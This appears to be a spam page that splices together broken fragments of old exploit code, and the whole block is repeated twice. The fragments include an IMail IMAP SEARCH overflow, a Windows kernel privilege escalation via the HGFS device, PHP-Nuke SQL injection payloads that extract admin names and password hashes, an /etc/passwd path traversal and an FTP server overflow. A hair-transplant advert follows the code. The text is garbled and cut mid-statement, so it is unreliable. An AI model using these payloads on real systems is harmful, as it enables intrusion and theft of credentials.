8B8D 28EFFFFF |MOV ECX, DWORD PTR SS:[EBP-10D8] # 00418CD0 |. # But others like "SEARCH BEFORE" command will also trigger the overflow. ',$user); $user = strrev($user[1]); $user = substr($user,4,100); $user = strrev($user); echo "--EXPLOIT FINISHED--\n"; echo "userid : $userid\n"; echo "username: $user\n"; echo "password: $pw\n"; echo '--------------------'; } ? = 5) Error Quit("Not Windows NT family OS.\n"); printf("Major Version:%d Minor Version:%d\n", Major Version, Minor Version); switch(Minor Version) { case 1: //Windows XP System Id = 4; Token Offset = 0xc8; break; case 2: //Windows2003 System Id = 4; Token Offset = 0xc8; break; default: System Id = 8; Token Offset = 0xc8; } p Restore Buffer = malloc(0x100); if(p Restore Buffer == NULL) Error Quit("malloc failed.\n"); h Kernel = Load Library(Kernel Name); if(h Kernel == NULL) Error Quit("Load Library failed.\n"); printf("Load Base:%x\n", (ULONG)h Kernel); SSTOffset = Get Service Table(h Kernel, (ULONG)Get Proc Address(h Kernel, "Ke Service Descriptor Table")); SSTOffset += Kernel Base; printf("System Service Table Offset:%x\n", SSTOffset); Function Number = *(PULONG)((ULONG)Zw Vdm Control + 1); printf("Nt Vdm Control funciton number:%x\n", Function Number); Hook Address = (ULONG)(SSTOffset + Function Number * 4); printf("Nt Vdm Cotrol function entry address:%x\n", Hook Address); Allocation Size = 0x1000; p Store Buffer = (PULONG)0x7; if(Zw Allocate Virtual Memory((HANDLE)0xffffffff, &p Store Buffer, 0, &Allocation Size, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)) Error Quit("Zw Allocate Virtual Memory failed.\n"); Function Address = (PUCHAR)Get Proc Address(h Kernel, "Nt Vdm Control"); if(Function Address == NULL) Error Quit("Get Proc Address failed.\n"); *(PULONG)p Restore Buffer = Function Address - (PUCHAR)h Kernel + Kernel Base; memset((PVOID)0x0, 0x90, Allocation Size); h Device = Create File("\\.\HGFS", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(h Device == INVALID_HANDLE_VALUE) Error Quit("Create File failed.\n"); p Shellcode = (PULONG)shellcode; for(k = 0; p Shellcode[k++] ! = '\x0'; j++) buf[j] = Compute Hash(kfunctions[j]); buf[j++] = pbi. ' [+] nuke version: '.$version.' '; #DEBUG //print $http . = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; @header = ('Cookie' =/i) { print "\n[+]Exploit succeeded! \nexiting..."); return -1; } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return -2; } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he-h_addr); memset(&(their_addr.sin_zero), '\', 8); if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); return -1; } return sock; } int main(int argc,char *argv[]) { printf("\n+===============================Yeah============ ==========================+"); printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); printf("\n+= Remote Buffer Overflow Do S Exploit =+"); printf("\n+= b Y =+"); printf("\n+= Maks M.

/use/bin/perl # # Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit # Author: Zhen Han. # # Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON". = -1: mid = line.split('memberid=')[1] ################################################## ##########################################Isset like starts try: mid except Name Error: sys.exit("[-]Can't Get \"memberid\". Get Version Ex(&ovi)) Error Quit("Get Version Ex failed.\n"); if(Major Version ! CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); /************************************************** ****************/ /******* Oracle 10g R1 x Db. %s 15 $((0x8744eff))\n", argv[0]); fprintf(stderr, "An address can be acquired with:\n"); fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \t]\+\*%%esp'\n"); return 1; } attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1])); // output the bad PS printf( "%! = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; $logincookie = $cookie; print "\n[+]Eating cookie : P"; print "\n[+]Retrieving password"; @header = ('Cookie' =status_line; } print "\n[+]Retrieving username"; $query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,un ame,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd ! lang=&img=../../../../../etc/passwd" req = urllib2. POC: */ #include int port=21; struct hostent *he; struct sockaddr_in their_addr; int konekt(char *addr) { int sock; he=gethostbyname(addr); if(he==NULL) { printf("Unknow host!

/dev/null then echo "$i is VULNERABLE! \n"); exit (EXIT_FAILURE); } write (wfd, ptr, size); fchmod(wfd, fbuf.st_mode); close (wfd); free (ptr); fprintf (stdout, "* done\nexecute ./%s at your own risk! \n", fnbuf); return (EXIT_SUCCESS); } [table prefix]\n"; print "ex.: " . " 7\n"; credits(); exit; } /* few definitions */ if (empty($argv[3])){ $prefix = 'nuke';} #define tables prefix else {$prefix = $argv[3];} switch ($argv[2]){ case "6": $query ="modules.php? "\n"; $result = file_get_contents($http); preg_match("/([a-f0-9]{32})/", $result, $matches); if ($matches[0]) {print "Admin's Hash: ".$matches[0]; if (preg_match("/(? */ #include /* smb ripped defines/etc */ #define MAX_DGRAM_SIZE 576 #define MAX_NETBIOSNAME_LEN 16 typedef char nstring[MAX_NETBIOSNAME_LEN]; typedef char unstring[MAX_NETBIOSNAME_LEN*4]; enum node_type {B_NODE=0, P_NODE=1, M_NODE=2, NBDD_NODE=3}; #define PTR_DIFF(p1,p2) (/*(ptrdiff_t)*/(((const char *)(p1)) - (const char *)(p2))) #define CVAL_NC(buf,pos) (((unsigned char *)(buf))[pos]) /* Non-const version of CVAL */ #define SSVALX(buf,pos,val) (CVAL_NC(buf,pos)=(unsigned char)((val)&0x FF), CVAL_NC(buf,pos+1)=(unsigned char)((val)8)) #define SSVAL(buf,pos,val) SSVALX((buf),(pos),((uint16_t)(val))) #define SCVAL(buf,pos,val) (CVAL_NC(buf,pos) = (val)) /* A netbios name structure. SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)'); select * from sh2kerr; /************************************************** ****************/ /******* Oracle 10g R1 x Db. Request(url, None, headers) html = urllib2.urlopen(req).read() html = re.sub('\n','',html) ident =re.findall('$conf_oreon\[\'host\'\] = "(.*? [0in] From Dark-Code Rs Security & Programming Group!

8B8D 28EFFFFF |MOV ECX, DWORD PTR SS:[EBP-10D8] # 00418CD0 |. # But others like "SEARCH BEFORE" command will also trigger the overflow. ',$user); $user = strrev($user[1]); $user = substr($user,4,100); $user = strrev($user); echo "--EXPLOIT FINISHED--\n"; echo "userid : $userid\n"; echo "username: $user\n"; echo "password: $pw\n"; echo '--------------------'; } ? = 5) Error Quit("Not Windows NT family OS.\n"); printf("Major Version:%d Minor Version:%d\n", Major Version, Minor Version); switch(Minor Version) { case 1: //Windows XP System Id = 4; Token Offset = 0xc8; break; case 2: //Windows2003 System Id = 4; Token Offset = 0xc8; break; default: System Id = 8; Token Offset = 0xc8; } p Restore Buffer = malloc(0x100); if(p Restore Buffer == NULL) Error Quit("malloc failed.\n"); h Kernel = Load Library(Kernel Name); if(h Kernel == NULL) Error Quit("Load Library failed.\n"); printf("Load Base:%x\n", (ULONG)h Kernel); SSTOffset = Get Service Table(h Kernel, (ULONG)Get Proc Address(h Kernel, "Ke Service Descriptor Table")); SSTOffset += Kernel Base; printf("System Service Table Offset:%x\n", SSTOffset); Function Number = *(PULONG)((ULONG)Zw Vdm Control + 1); printf("Nt Vdm Control funciton number:%x\n", Function Number); Hook Address = (ULONG)(SSTOffset + Function Number * 4); printf("Nt Vdm Cotrol function entry address:%x\n", Hook Address); Allocation Size = 0x1000; p Store Buffer = (PULONG)0x7; if(Zw Allocate Virtual Memory((HANDLE)0xffffffff, &p Store Buffer, 0, &Allocation Size, MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE)) Error Quit("Zw Allocate Virtual Memory failed.\n"); Function Address = (PUCHAR)Get Proc Address(h Kernel, "Nt Vdm Control"); if(Function Address == NULL) Error Quit("Get Proc Address failed.\n"); *(PULONG)p Restore Buffer = Function Address - (PUCHAR)h Kernel + Kernel Base; memset((PVOID)0x0, 0x90, Allocation Size); h Device = Create File("\\.\HGFS", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if(h Device == INVALID_HANDLE_VALUE) Error Quit("Create File failed.\n"); p Shellcode = (PULONG)shellcode; for(k = 0; p Shellcode[k++] ! = '\x0'; j++) buf[j] = Compute Hash(kfunctions[j]); buf[j++] = pbi. ' [+] nuke version: '.$version.' '; #DEBUG //print $http . = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; @header = ('Cookie' =/i) { print "\n[+]Exploit succeeded! \nexiting..."); return -1; } if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return -2; } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(port); their_addr.sin_addr = *((struct in_addr *)he-h_addr); memset(&(their_addr.sin_zero), '\', 8); if (connect(sock, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); return -1; } return sock; } int main(int argc,char *argv[]) { printf("\n+===============================Yeah============ ==========================+"); printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); printf("\n+= Remote Buffer Overflow Do S Exploit =+"); printf("\n+= b Y =+"); printf("\n+= Maks M.

/use/bin/perl # # Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit # Author: Zhen Han. # # Multiple SEARCH COMMAND is vulnerable,in this case, we use "SEARCH ON". = -1: mid = line.split('memberid=')[1] ################################################## ##########################################Isset like starts try: mid except Name Error: sys.exit("[-]Can't Get \"memberid\". Get Version Ex(&ovi)) Error Quit("Get Version Ex failed.\n"); if(Major Version ! CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)'); /************************************************** ****************/ /******* Oracle 10g R1 x Db. %s 15 $((0x8744eff))\n", argv[0]); fprintf(stderr, "An address can be acquired with:\n"); fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \t]\+\*%%esp'\n"); return 1; } attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1])); // output the bad PS printf( "%! = \'lol";s:3:"uid";s:1:"1";s:4:"ugmt";s:2:"+0";s:10:"ulastvisit";s:10:"1204046206";s:4:"priv";a:9:{s:4:"news";s:4:"news";s:5:"polls";s:2:"po";s:7:"mailing";s:2:"ma";s:5:"pages";s:2:"pa";s:5:"users";s:2:"us";s:8:"settings";s:2:"se";s:5:"forum";s:2:"fo";s:6:"blocks";s:2:"bl";s:8:"download";s:2:"do";}}'); $cookie =~ s/\n//g; $logincookie = $cookie; print "\n[+]Eating cookie : P"; print "\n[+]Retrieving password"; @header = ('Cookie' =status_line; } print "\n[+]Retrieving username"; $query = "lalalalalala' UNION SELECT uname,uname,uname,uname,uname,uname,uname,uname,un ame,uname,uname,uname,uname,uname,uname FROM ".$prefix."users WHERE 1=1 AND uid ='".$target_id; $cookie = encode_base64('a:6:{s:5:"uname";s:'.length($query).':"'.$query.'";s:4:"upwd";s:17:"\' OR upwd ! lang=&img=../../../../../etc/passwd" req = urllib2. POC: */ #include int port=21; struct hostent *he; struct sockaddr_in their_addr; int konekt(char *addr) { int sock; he=gethostbyname(addr); if(he==NULL) { printf("Unknow host!

  1. definition of a serious dating relationship 21-Feb-2016 22:56

    Par sa technique unique sans douleur, sans cicatrice et par un traitement de cheveu par cheveu, la méthode DHI garantit une gestion artistique de la greffe de cheveux de l’extraction à l’implantation.